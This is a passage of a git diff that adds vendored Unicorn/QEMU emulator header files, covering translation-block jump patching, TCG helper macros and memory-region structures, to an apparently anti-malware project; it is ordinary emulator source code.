!QEMU_GNUC_PREREQ(4, 1) + register unsigned long _beg __asm ("a1"); + register unsigned long _end __asm ("a2"); + register unsigned long _flg __asm ("a3"); +#endif + + /* we could use a ldr pc, [pc, #-4] kind of branch and avoid the flush */ + *(uint32_t *)jmp_addr = + (*(uint32_t *)jmp_addr & ~0xffffff) + | (((addr - (jmp_addr + 8)) >> 2) & 0xffffff); + +#if QEMU_GNUC_PREREQ(4, 1) + __builtin___clear_cache((char *) jmp_addr, (char *) jmp_addr + 4); +#else + /* flush icache */ + _beg = jmp_addr; + _end = jmp_addr + 4; + _flg = 0; + __asm __volatile__ ("swi 0x9f0002" : : "r" (_beg), "r" (_end), "r" (_flg)); +#endif +} +#elif defined(__sparc__) || defined(__mips__) +void tb_set_jmp_target1(uintptr_t jmp_addr, uintptr_t addr); +#else +#error tb_set_jmp_target1 is missing +#endif + +static inline void tb_set_jmp_target(TranslationBlock *tb, + int n, uintptr_t addr) +{ + uint16_t offset = tb->tb_jmp_offset[n]; + tb_set_jmp_target1((uintptr_t)((char*)tb->tc_ptr + offset), addr); +} + +#else + +/* set the jump target */ +static inline void tb_set_jmp_target(TranslationBlock *tb, + int n, uintptr_t addr) +{ + tb->tb_next[n] = addr; +} + +#endif + +static inline void tb_add_jump(TranslationBlock *tb, int n, + TranslationBlock *tb_next) +{ + /* NOTE: this test is only needed for thread safety */ + if (!tb->jmp_next[n]) { + /* patch the native jump address */ + tb_set_jmp_target(tb, n, (uintptr_t)tb_next->tc_ptr); + + /* add in TB jmp circular list */ + tb->jmp_next[n] = tb_next->jmp_first; + tb_next->jmp_first = (TranslationBlock *)((uintptr_t)(tb) | (n)); + } +} + +/* GETRA is the true target of the return instruction that we'll execute, + defined here for simplicity of defining the follow-up macros. */ +#if defined(CONFIG_TCG_INTERPRETER) +extern uintptr_t tci_tb_ptr; +# define GETRA() tci_tb_ptr +#elif defined(_MSC_VER) +#include <intrin.h> +# define GETRA() (uintptr_t)_ReturnAddress() +#else +# define GETRA() \ + ((uintptr_t)__builtin_extract_return_addr(__builtin_return_address(0))) +#endif + +/* The true return address will often point to a host insn that is part of + the next translated guest insn. Adjust the address backward to point to + the middle of the call insn. Subtracting one would do the job except for + several compressed mode architectures (arm, mips) which set the low bit + to indicate the compressed mode; subtracting two works around that. It + is also the case that there are no host isas that contain a call insn + smaller than 4 bytes, so we don't worry about special-casing this. */ +#if defined(CONFIG_TCG_INTERPRETER) +# define GETPC_ADJ 0 +#else +# define GETPC_ADJ 2 +#endif + +#define GETPC() (GETRA() - GETPC_ADJ) + +#if !defined(CONFIG_USER_ONLY) + +void phys_mem_set_alloc(void *(*alloc)(size_t, uint64_t *align)); + +struct MemoryRegion *iotlb_to_region(AddressSpace *as, hwaddr index); +bool io_mem_read(struct MemoryRegion *mr, hwaddr addr, + uint64_t *pvalue, unsigned size); +bool io_mem_write(struct MemoryRegion *mr, hwaddr addr, + uint64_t value, unsigned size); + + +void tlb_fill(CPUState *cpu, target_ulong addr, int is_write, int mmu_idx, + uintptr_t retaddr); +#endif + +#if defined(CONFIG_USER_ONLY) +static inline tb_page_addr_t get_page_addr_code(CPUArchState *env1, target_ulong addr) +{ + return addr; +} +#else +/* cputlb.c */ +tb_page_addr_t get_page_addr_code(CPUArchState *env1, target_ulong addr); +#endif + +/* vl.c */ +extern int singlestep; + +/* cpu-exec.c */ +extern volatile sig_atomic_t exit_request; + +/** + * cpu_can_do_io: + * @cpu: The CPU for which to check IO. + * + * Deterministic execution requires that IO only be performed on the last + * instruction of a TB so that interrupts take effect immediately. + * + * Returns: %true if memory-mapped IO is safe, %false otherwise. + */ +static inline bool cpu_can_do_io(CPUState *cpu) +{ + return true; +} + +void phys_mem_clean(struct uc_struct* uc); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/gen-icount.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/gen-icount.h new file mode 100644 index 0000000..bbbc5de --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/gen-icount.h @@ -0,0 +1,72 @@ +#ifndef GEN_ICOUNT_H +#define GEN_ICOUNT_H 1 + +#include "qemu/timer.h" + +/* Helpers for instruction counting code generation. */ + +//static TCGArg *icount_arg; +//static int icount_label; + +static inline void gen_tb_start(TCGContext *tcg_ctx) +{ + // TCGv_i32 count; + TCGv_i32 flag; + + tcg_ctx->exitreq_label = gen_new_label(tcg_ctx); + flag = tcg_temp_new_i32(tcg_ctx); + tcg_gen_ld_i32(tcg_ctx, flag, tcg_ctx->cpu_env, + offsetof(CPUState, tcg_exit_req) - ENV_OFFSET); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_NE, flag, 0, tcg_ctx->exitreq_label); + tcg_temp_free_i32(tcg_ctx, flag); + +#if 0 + if (!use_icount) + return; + + icount_label = gen_new_label(); + count = tcg_temp_local_new_i32(); + tcg_gen_ld_i32(count, cpu_env, + -ENV_OFFSET + offsetof(CPUState, icount_decr.u32)); + /* This is a horrid hack to allow fixing up the value later. */ + icount_arg = tcg_ctx.gen_opparam_ptr + 1; + tcg_gen_subi_i32(count, count, 0xdeadbeef); + + tcg_gen_brcondi_i32(TCG_COND_LT, count, 0, icount_label); + tcg_gen_st16_i32(count, cpu_env, + -ENV_OFFSET + offsetof(CPUState, icount_decr.u16.low)); + tcg_temp_free_i32(count); +#endif +} + +static inline void gen_tb_end(TCGContext *tcg_ctx, TranslationBlock *tb, int num_insns) +{ + gen_set_label(tcg_ctx, tcg_ctx->exitreq_label); + tcg_gen_exit_tb(tcg_ctx, (uintptr_t)tb + TB_EXIT_REQUESTED); + +#if 0 + if (use_icount) { + *icount_arg = num_insns; + gen_set_label(icount_label); + tcg_gen_exit_tb((uintptr_t)tb + TB_EXIT_ICOUNT_EXPIRED); + } +#endif +} + +#if 0 +static inline void gen_io_start(void) +{ + TCGv_i32 tmp = tcg_const_i32(1); + tcg_gen_st_i32(tmp, cpu_env, -ENV_OFFSET + offsetof(CPUState, can_do_io)); + tcg_temp_free_i32(tmp); +} + +static inline void gen_io_end(void) +{ + TCGv_i32 tmp = tcg_const_i32(0); + tcg_gen_st_i32(tmp, cpu_env, -ENV_OFFSET + offsetof(CPUState, can_do_io)); + tcg_temp_free_i32(tmp); +} +#endif + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/helper-gen.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/helper-gen.h new file mode 100644 index 0000000..df3ea61 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/helper-gen.h @@ -0,0 +1,70 @@ +/* Helper file for declaring TCG helper functions. + This one expands generation functions for tcg opcodes. */ + +#ifndef HELPER_GEN_H +#define HELPER_GEN_H 1 + +#include <exec/helper-head.h> + +#define DEF_HELPER_FLAGS_0(name, flags, ret) \ +static inline void glue(gen_helper_, name)(TCGContext *tcg_ctx, dh_retvar_decl0(ret)) \ +{ \ + tcg_gen_callN(tcg_ctx, HELPER(name), dh_retvar(ret), 0, NULL); \ +} + +#define DEF_HELPER_FLAGS_1(name, flags, ret, t1) \ +static inline void glue(gen_helper_, name)(TCGContext *tcg_ctx, dh_retvar_decl(ret) \ + dh_arg_decl(t1, 1)) \ +{ \ + TCGArg args[1] = { dh_arg(t1, 1) }; \ + tcg_gen_callN(tcg_ctx, HELPER(name), dh_retvar(ret), 1, args); \ +} + +#define DEF_HELPER_FLAGS_2(name, flags, ret, t1, t2) \ +static inline void glue(gen_helper_, name)(TCGContext *tcg_ctx, dh_retvar_decl(ret) \ + dh_arg_decl(t1, 1), dh_arg_decl(t2, 2)) \ +{ \ + TCGArg args[2] = { dh_arg(t1, 1), dh_arg(t2, 2) }; \ + tcg_gen_callN(tcg_ctx, HELPER(name), dh_retvar(ret), 2, args); \ +} + +#define DEF_HELPER_FLAGS_3(name, flags, ret, t1, t2, t3) \ +static inline void glue(gen_helper_, name)(TCGContext *tcg_ctx, dh_retvar_decl(ret) \ + dh_arg_decl(t1, 1), dh_arg_decl(t2, 2), dh_arg_decl(t3, 3)) \ +{ \ + TCGArg args[3] = { dh_arg(t1, 1), dh_arg(t2, 2), dh_arg(t3, 3) }; \ + tcg_gen_callN(tcg_ctx, HELPER(name), dh_retvar(ret), 3, args); \ +} + +#define DEF_HELPER_FLAGS_4(name, flags, ret, t1, t2, t3, t4) \ +static inline void glue(gen_helper_, name)(TCGContext *tcg_ctx, dh_retvar_decl(ret) \ + dh_arg_decl(t1, 1), dh_arg_decl(t2, 2), \ + dh_arg_decl(t3, 3), dh_arg_decl(t4, 4)) \ +{ \ + TCGArg args[4] = { dh_arg(t1, 1), dh_arg(t2, 2), \ + dh_arg(t3, 3), dh_arg(t4, 4) }; \ + tcg_gen_callN(tcg_ctx, HELPER(name), dh_retvar(ret), 4, args); \ +} + +#define DEF_HELPER_FLAGS_5(name, flags, ret, t1, t2, t3, t4, t5) \ +static inline void glue(gen_helper_, name)(TCGContext *tcg_ctx, dh_retvar_decl(ret) \ + dh_arg_decl(t1, 1), dh_arg_decl(t2, 2), dh_arg_decl(t3, 3), \ + dh_arg_decl(t4, 4), dh_arg_decl(t5, 5)) \ +{ \ + TCGArg args[5] = { dh_arg(t1, 1), dh_arg(t2, 2), dh_arg(t3, 3), \ + dh_arg(t4, 4), dh_arg(t5, 5) }; \ + tcg_gen_callN(tcg_ctx, HELPER(name), dh_retvar(ret), 5, args); \ +} + +#include "helper.h" +#include "tcg-runtime.h" + +#undef DEF_HELPER_FLAGS_0 +#undef DEF_HELPER_FLAGS_1 +#undef DEF_HELPER_FLAGS_2 +#undef DEF_HELPER_FLAGS_3 +#undef DEF_HELPER_FLAGS_4 +#undef DEF_HELPER_FLAGS_5 +#undef GEN_HELPER + +#endif /* HELPER_GEN_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/helper-head.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/helper-head.h new file mode 100644 index 0000000..b009ccb --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/helper-head.h @@ -0,0 +1,134 @@ +/* Helper file for declaring TCG helper functions. + Used by other helper files. + + Targets should use DEF_HELPER_N and DEF_HELPER_FLAGS_N to declare helper + functions. Names should be specified without the helper_ prefix, and + the return and argument types specified. 3 basic types are understood + (i32, i64 and ptr). Additional aliases are provided for convenience and + to match the types used by the C helper implementation. + + The target helper.h should be included in all files that use/define + helper functions. THis will ensure that function prototypes are + consistent. In addition it should be included an extra two times for + helper.c, defining: + GEN_HELPER 1 to produce op generation functions (gen_helper_*) + GEN_HELPER 2 to do runtime registration helper functions. + */ + +#ifndef DEF_HELPER_H +#define DEF_HELPER_H 1 + +#include "qemu/osdep.h" + +#define HELPER(name) glue(helper_, name) + +#define GET_TCGV_i32 GET_TCGV_I32 +#define GET_TCGV_i64 GET_TCGV_I64 +#define GET_TCGV_ptr GET_TCGV_PTR + +/* Some types that make sense in C, but not for TCG. */ +#define dh_alias_i32 i32 +#define dh_alias_s32 i32 +#define dh_alias_int i32 +#define dh_alias_i64 i64 +#define dh_alias_s64 i64 +#define dh_alias_f32 i32 +#define dh_alias_f64 i64 +#ifdef TARGET_LONG_BITS +# if TARGET_LONG_BITS == 32 +# define dh_alias_tl i32 +# else +# define dh_alias_tl i64 +# endif +#endif +#define dh_alias_ptr ptr +#define dh_alias_void void +#define dh_alias_noreturn noreturn +#define dh_alias_env ptr +#define dh_alias(t) glue(dh_alias_, t) + +#define dh_ctype_i32 uint32_t +#define dh_ctype_s32 int32_t +#define dh_ctype_int int +#define dh_ctype_i64 uint64_t +#define dh_ctype_s64 int64_t +#define dh_ctype_f32 float32 +#define dh_ctype_f64 float64 +#define dh_ctype_tl target_ulong +#define dh_ctype_ptr void * +#define dh_ctype_void void +#define dh_ctype_noreturn void QEMU_NORETURN +#define dh_ctype_env CPUArchState * +#define dh_ctype(t) dh_ctype_##t + +/* We can't use glue() here because it falls foul of C preprocessor + recursive expansion rules. */ +#define dh_retvar_decl0_void void +#define dh_retvar_decl0_noreturn void +#define dh_retvar_decl0_i32 TCGv_i32 retval +#define dh_retvar_decl0_i64 TCGv_i64 retval +#define dh_retvar_decl0_ptr TCGv_ptr retval +#define dh_retvar_decl0(t) glue(dh_retvar_decl0_, dh_alias(t)) + +#define dh_retvar_decl_void +#define dh_retvar_decl_noreturn +#define dh_retvar_decl_i32 TCGv_i32 retval, +#define dh_retvar_decl_i64 TCGv_i64 retval, +#define dh_retvar_decl_ptr TCGv_ptr retval, +#define dh_retvar_decl(t) glue(dh_retvar_decl_, dh_alias(t)) + +#define dh_retvar_void TCG_CALL_DUMMY_ARG +#define dh_retvar_noreturn TCG_CALL_DUMMY_ARG +#define dh_retvar_i32 GET_TCGV_i32(retval) +#define dh_retvar_i64 GET_TCGV_i64(retval) +#define dh_retvar_ptr GET_TCGV_ptr(retval) +#define dh_retvar(t) glue(dh_retvar_, dh_alias(t)) + +#define dh_is_64bit_void 0 +#define dh_is_64bit_noreturn 0 +#define dh_is_64bit_i32 0 +#define dh_is_64bit_i64 1 +#define dh_is_64bit_ptr (sizeof(void *) == 8) +#define dh_is_64bit(t) glue(dh_is_64bit_, dh_alias(t)) + +#define dh_is_signed_void 0 +#define dh_is_signed_noreturn 0 +#define dh_is_signed_i32 0 +#define dh_is_signed_s32 1 +#define dh_is_signed_i64 0 +#define dh_is_signed_s64 1 +#define dh_is_signed_f32 0 +#define dh_is_signed_f64 0 +#define dh_is_signed_tl 0 +#define dh_is_signed_int 1 +/* ??? This is highly specific to the host cpu. There are even special + extension instructions that may be required, e.g. ia64's addp4. But + for now we don't support any 64-bit targets with 32-bit pointers. */ +#define dh_is_signed_ptr 0 +#define dh_is_signed_env dh_is_signed_ptr +#define dh_is_signed(t) dh_is_signed_##t + +#define dh_sizemask(t, n) \ + ((dh_is_64bit(t) << (n*2)) | (dh_is_signed(t) << (n*2+1))) + +#define dh_arg(t, n) \ + glue(GET_TCGV_, dh_alias(t))(glue(arg, n)) + +#define dh_arg_decl(t, n) glue(TCGv_, dh_alias(t)) glue(arg, n) + +#define DEF_HELPER_0(name, ret) \ + DEF_HELPER_FLAGS_0(name, 0, ret) +#define DEF_HELPER_1(name, ret, t1) \ + DEF_HELPER_FLAGS_1(name, 0, ret, t1) +#define DEF_HELPER_2(name, ret, t1, t2) \ + DEF_HELPER_FLAGS_2(name, 0, ret, t1, t2) +#define DEF_HELPER_3(name, ret, t1, t2, t3) \ + DEF_HELPER_FLAGS_3(name, 0, ret, t1, t2, t3) +#define DEF_HELPER_4(name, ret, t1, t2, t3, t4) \ + DEF_HELPER_FLAGS_4(name, 0, ret, t1, t2, t3, t4) +#define DEF_HELPER_5(name, ret, t1, t2, t3, t4, t5) \ + DEF_HELPER_FLAGS_5(name, 0, ret, t1, t2, t3, t4, t5) + +/* MAX_OPC_PARAM_IARGS must be set to n if last entry is DEF_HELPER_FLAGS_n. */ + +#endif /* DEF_HELPER_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/helper-proto.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/helper-proto.h new file mode 100644 index 0000000..828951c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/helper-proto.h @@ -0,0 +1,39 @@ +/* Helper file for declaring TCG helper functions. + This one expands prototypes for the helper functions. */ + +#ifndef HELPER_PROTO_H +#define HELPER_PROTO_H 1 + +#include <exec/helper-head.h> + +#define DEF_HELPER_FLAGS_0(name, flags, ret) \ +dh_ctype(ret) HELPER(name) (void); + +#define DEF_HELPER_FLAGS_1(name, flags, ret, t1) \ +dh_ctype(ret) HELPER(name) (dh_ctype(t1)); + +#define DEF_HELPER_FLAGS_2(name, flags, ret, t1, t2) \ +dh_ctype(ret) HELPER(name) (dh_ctype(t1), dh_ctype(t2)); + +#define DEF_HELPER_FLAGS_3(name, flags, ret, t1, t2, t3) \ +dh_ctype(ret) HELPER(name) (dh_ctype(t1), dh_ctype(t2), dh_ctype(t3)); + +#define DEF_HELPER_FLAGS_4(name, flags, ret, t1, t2, t3, t4) \ +dh_ctype(ret) HELPER(name) (dh_ctype(t1), dh_ctype(t2), dh_ctype(t3), \ + dh_ctype(t4)); + +#define DEF_HELPER_FLAGS_5(name, flags, ret, t1, t2, t3, t4, t5) \ +dh_ctype(ret) HELPER(name) (dh_ctype(t1), dh_ctype(t2), dh_ctype(t3), \ + dh_ctype(t4), dh_ctype(t5)); + +#include "helper.h" +#include "tcg-runtime.h" + +#undef DEF_HELPER_FLAGS_0 +#undef DEF_HELPER_FLAGS_1 +#undef DEF_HELPER_FLAGS_2 +#undef DEF_HELPER_FLAGS_3 +#undef DEF_HELPER_FLAGS_4 +#undef DEF_HELPER_FLAGS_5 + +#endif /* HELPER_PROTO_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/helper-tcg.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/helper-tcg.h new file mode 100644 index 0000000..5b12f31 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/helper-tcg.h @@ -0,0 +1,48 @@ +/* Helper file for declaring TCG helper functions. + This one defines data structures private to tcg.c. */ + +#ifndef HELPER_TCG_H +#define HELPER_TCG_H 1 + +#include <exec/helper-head.h> + +#define DEF_HELPER_FLAGS_0(NAME, FLAGS, ret) \ + { HELPER(NAME), #NAME, FLAGS, \ + dh_sizemask(ret, 0) }, + +#define DEF_HELPER_FLAGS_1(NAME, FLAGS, ret, t1) \ + { HELPER(NAME), #NAME, FLAGS, \ + dh_sizemask(ret, 0) | dh_sizemask(t1, 1) }, + +#define DEF_HELPER_FLAGS_2(NAME, FLAGS, ret, t1, t2) \ + { HELPER(NAME), #NAME, FLAGS, \ + dh_sizemask(ret, 0) | dh_sizemask(t1, 1) \ + | dh_sizemask(t2, 2) }, + +#define DEF_HELPER_FLAGS_3(NAME, FLAGS, ret, t1, t2, t3) \ + { HELPER(NAME), #NAME, FLAGS, \ + dh_sizemask(ret, 0) | dh_sizemask(t1, 1) \ + | dh_sizemask(t2, 2) | dh_sizemask(t3, 3) }, + +#define DEF_HELPER_FLAGS_4(NAME, FLAGS, ret, t1, t2, t3, t4) \ + { HELPER(NAME), #NAME, FLAGS, \ + dh_sizemask(ret, 0) | dh_sizemask(t1, 1) \ + | dh_sizemask(t2, 2) | dh_sizemask(t3, 3) | dh_sizemask(t4, 4) }, + +#define DEF_HELPER_FLAGS_5(NAME, FLAGS, ret, t1, t2, t3, t4, t5) \ + { HELPER(NAME), #NAME, FLAGS, \ + dh_sizemask(ret, 0) | dh_sizemask(t1, 1) \ + | dh_sizemask(t2, 2) | dh_sizemask(t3, 3) | dh_sizemask(t4, 4) \ + | dh_sizemask(t5, 5) }, + +#include "helper.h" +#include "tcg-runtime.h" + +#undef DEF_HELPER_FLAGS_0 +#undef DEF_HELPER_FLAGS_1 +#undef DEF_HELPER_FLAGS_2 +#undef DEF_HELPER_FLAGS_3 +#undef DEF_HELPER_FLAGS_4 +#undef DEF_HELPER_FLAGS_5 + +#endif /* HELPER_TCG_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/hwaddr.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/hwaddr.h new file mode 100644 index 0000000..8ac8394 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/hwaddr.h @@ -0,0 +1,22 @@ +/* Define hwaddr if it exists. */ + +#ifndef HWADDR_H +#define HWADDR_H + +#define HWADDR_BITS 64 +/* hwaddr is the type of a physical address (its size can + be different from 'target_ulong'). */ + +#include "unicorn/platform.h" + +typedef uint64_t hwaddr; +#define HWADDR_MAX UINT64_MAX +#define TARGET_FMT_plx "%016" PRIx64 +#define HWADDR_PRId PRId64 +#define HWADDR_PRIi PRIi64 +#define HWADDR_PRIo PRIo64 +#define HWADDR_PRIu PRIu64 +#define HWADDR_PRIx PRIx64 +#define HWADDR_PRIX PRIX64 + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/ioport.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/ioport.h new file mode 100644 index 0000000..0d32c89 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/ioport.h @@ -0,0 +1,59 @@ +/* + * defines ioport related functions + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see <http://www.gnu.org/licenses/>. + */ + +/************************************************************************** + * IO ports API + */ + +#ifndef IOPORT_H +#define IOPORT_H + +#include "qemu-common.h" +#include "qom/object.h" +#include "exec/memory.h" + +typedef uint32_t pio_addr_t; +#define FMT_pioaddr PRIx32 + +#define MAX_IOPORTS (64 * 1024) +#define IOPORTS_MASK (MAX_IOPORTS - 1) + +typedef struct MemoryRegionPortio { + uint32_t offset; + uint32_t len; + unsigned size; + uint32_t (*read)(void *opaque, uint32_t address); + void (*write)(void *opaque, uint32_t address, uint32_t data); + uint32_t base; /* private field */ +} MemoryRegionPortio; + +#define PORTIO_END_OF_LIST() { } + +#ifndef CONFIG_USER_ONLY +extern const MemoryRegionOps unassigned_io_ops; +#endif + +void cpu_outb(struct uc_struct *uc, pio_addr_t addr, uint8_t val); +void cpu_outw(struct uc_struct *uc, pio_addr_t addr, uint16_t val); +void cpu_outl(struct uc_struct *uc, pio_addr_t addr, uint32_t val); +uint8_t cpu_inb(struct uc_struct *uc, pio_addr_t addr); +uint16_t cpu_inw(struct uc_struct *uc, pio_addr_t addr); +uint32_t cpu_inl(struct uc_struct *uc, pio_addr_t addr); + +#endif /* IOPORT_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/memory-internal.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/memory-internal.h new file mode 100644 index 0000000..d3546d2 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/memory-internal.h @@ -0,0 +1,36 @@ +/* + * Declarations for obsolete exec.c functions + * + * Copyright 2011 Red Hat, Inc. and/or its affiliates + * + * Authors: + * Avi Kivity <avi@redhat.com> + * + * This work is licensed under the terms of the GNU GPL, version 2 or + * later. See the COPYING file in the top-level directory. + * + */ + +/* + * This header is for use by exec.c and memory.c ONLY. Do not include it. + * The functions declared here will be removed soon. + */ + +#ifndef MEMORY_INTERNAL_H +#define MEMORY_INTERNAL_H + +#ifndef CONFIG_USER_ONLY +typedef struct AddressSpaceDispatch AddressSpaceDispatch; + +void address_space_init_dispatch(AddressSpace *as); +void address_space_destroy_dispatch(AddressSpace *as); + +extern const MemoryRegionOps unassigned_mem_ops; + +bool memory_region_access_valid(MemoryRegion *mr, hwaddr addr, + unsigned size, bool is_write); + +void address_space_unregister(AddressSpace *as); + +#endif +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/memory.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/memory.h new file mode 100644 index 0000000..ef28b9d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/memory.h @@ -0,0 +1,864 @@ +/* + * Physical memory management API + * + * Copyright 2011 Red Hat, Inc. and/or its affiliates + * + * Authors: + * Avi Kivity <avi@redhat.com> + * + * This work is licensed under the terms of the GNU GPL, version 2. See + * the COPYING file in the top-level directory. + * + */ + +#ifndef MEMORY_H +#define MEMORY_H + +#ifndef CONFIG_USER_ONLY + +#define DIRTY_MEMORY_CODE 0 +#define DIRTY_MEMORY_NUM 1 /* num of dirty bits */ + +#include "unicorn/platform.h" +#include "qemu-common.h" +#include "exec/cpu-common.h" +#include "exec/hwaddr.h" +#include "qemu/queue.h" +#include "qemu/int128.h" +#include "qapi/error.h" +#include "qom/object.h" + +#define MAX_PHYS_ADDR_SPACE_BITS 62 +#define MAX_PHYS_ADDR (((hwaddr)1 << MAX_PHYS_ADDR_SPACE_BITS) - 1) + +#define TYPE_MEMORY_REGION "qemu:memory-region" +#define MEMORY_REGION(uc, obj) \ + OBJECT_CHECK(uc, MemoryRegion, (obj), TYPE_MEMORY_REGION) + +typedef struct MemoryRegionOps MemoryRegionOps; +typedef struct MemoryRegionMmio MemoryRegionMmio; + +struct MemoryRegionMmio { + CPUReadMemoryFunc *read[3]; + CPUWriteMemoryFunc *write[3]; +}; + +typedef struct IOMMUTLBEntry IOMMUTLBEntry; + +/* See address_space_translate: bit 0 is read, bit 1 is write. */ +typedef enum { + IOMMU_NONE = 0, + IOMMU_RO = 1, + IOMMU_WO = 2, + IOMMU_RW = 3, +} IOMMUAccessFlags; + +struct IOMMUTLBEntry { + AddressSpace *target_as; + hwaddr iova; + hwaddr translated_addr; + hwaddr addr_mask; /* 0xfff = 4k translation */ + IOMMUAccessFlags perm; +}; + +/* + * Memory region callbacks + */ +struct MemoryRegionOps { + /* Read from the memory region. @addr is relative to @mr; @size is + * in bytes. */ + uint64_t (*read)(struct uc_struct* uc, void *opaque, + hwaddr addr, + unsigned size); + /* Write to the memory region. @addr is relative to @mr; @size is + * in bytes. */ + void (*write)(struct uc_struct* uc, void *opaque, + hwaddr addr, + uint64_t data, + unsigned size); + + enum device_endian endianness; + /* Guest-visible constraints: */ + struct { + /* If nonzero, specify bounds on access sizes beyond which a machine + * check is thrown. + */ + unsigned min_access_size; + unsigned max_access_size; + /* If true, unaligned accesses are supported. Otherwise unaligned + * accesses throw machine checks. + */ + bool unaligned; + /* + * If present, and returns #false, the transaction is not accepted + * by the device (and results in machine dependent behaviour such + * as a machine check exception). + */ + bool (*accepts)(void *opaque, hwaddr addr, + unsigned size, bool is_write); + } valid; + /* Internal implementation constraints: */ + struct { + /* If nonzero, specifies the minimum size implemented. Smaller sizes + * will be rounded upwards and a partial result will be returned. + */ + unsigned min_access_size; + /* If nonzero, specifies the maximum size implemented. Larger sizes + * will be done as a series of accesses with smaller sizes. + */ + unsigned max_access_size; + /* If true, unaligned accesses are supported. Otherwise all accesses + * are converted to (possibly multiple) naturally aligned accesses. + */ + bool unaligned; + } impl; + + /* If .read and .write are not present, old_mmio may be used for + * backwards compatibility with old mmio registration + */ + const MemoryRegionMmio old_mmio; +}; + +typedef struct MemoryRegionIOMMUOps MemoryRegionIOMMUOps; + +struct MemoryRegionIOMMUOps { + /* Return a TLB entry that contains a given address. */ + IOMMUTLBEntry (*translate)(MemoryRegion *iommu, hwaddr addr, bool is_write); +}; + +struct MemoryRegion { + Object parent_obj; + /* All fields are private - violators will be prosecuted */ + const MemoryRegionOps *ops; + const MemoryRegionIOMMUOps *iommu_ops; + void *opaque; + MemoryRegion *container; + Int128 size; + hwaddr addr; + void (*destructor)(MemoryRegion *mr); + ram_addr_t ram_addr; + uint64_t align; + bool subpage; + bool terminates; + bool romd_mode; + bool ram; + bool skip_dump; + bool readonly; /* For RAM regions */ + bool enabled; + bool rom_device; + bool warning_printed; /* For reservations */ + MemoryRegion *alias; + hwaddr alias_offset; + int32_t priority; + bool may_overlap; + QTAILQ_HEAD(subregions, MemoryRegion) subregions; + QTAILQ_ENTRY(MemoryRegion) subregions_link; + const char *name; + uint8_t dirty_log_mask; + struct uc_struct *uc; + uint32_t perms; //all perms, partially redundant with readonly + uint64_t end; +}; + +/** + * MemoryListener: callbacks structure for updates to the physical memory map + * + * Allows a component to adjust to changes in the guest-visible memory map. + * Use with memory_listener_register() and memory_listener_unregister(). + */ +struct MemoryListener { + void (*begin)(MemoryListener *listener); + void (*commit)(MemoryListener *listener); + void (*region_add)(MemoryListener *listener, MemoryRegionSection *section); + void (*region_del)(MemoryListener *listener, MemoryRegionSection *section); + void (*region_nop)(MemoryListener *listener, MemoryRegionSection *section); + void (*log_start)(MemoryListener *listener, MemoryRegionSection *section); + void (*log_stop)(MemoryListener *listener, MemoryRegionSection *section); + void (*log_sync)(MemoryListener *listener, MemoryRegionSection *section); + void (*log_global_start)(MemoryListener *listener); + void (*log_global_stop)(MemoryListener *listener); + /* Lower = earlier (during add), later (during del) */ + unsigned priority; + AddressSpace *address_space_filter; + QTAILQ_ENTRY(MemoryListener) link; +}; + +/** + * AddressSpace: describes a mapping of addresses to #MemoryRegion objects + */ +struct AddressSpace { + /* All fields are private. */ + char *name; + MemoryRegion *root; + struct FlatView *current_map; + struct AddressSpaceDispatch *dispatch; + struct AddressSpaceDispatch *next_dispatch; + MemoryListener dispatch_listener; + struct uc_struct* uc; + + QTAILQ_ENTRY(AddressSpace) address_spaces_link; +}; + +/** + * MemoryRegionSection: describes a fragment of a #MemoryRegion + * + * @mr: the region, or %NULL if empty + * @address_space: the address space the region is mapped in + * @offset_within_region: the beginning of the section, relative to @mr's start + * @size: the size of the section; will not exceed @mr's boundaries + * @offset_within_address_space: the address of the first byte of the section + * relative to the region's address space + * @readonly: writes to this section are ignored + */ +struct MemoryRegionSection { + MemoryRegion *mr; + AddressSpace *address_space; + hwaddr offset_within_region; + Int128 size; + hwaddr offset_within_address_space; + bool readonly; +}; + +static inline MemoryRegionSection MemoryRegionSection_make(MemoryRegion *mr, AddressSpace *address_space, + hwaddr offset_within_region, Int128 size, hwaddr offset_within_address_space, bool readonly) +{ + MemoryRegionSection section; + section.mr = mr; + section.address_space = address_space; + section.offset_within_region = offset_within_region; + section.size = size; + section.offset_within_address_space = offset_within_address_space; + section.readonly = readonly; + return section; +} + +/** 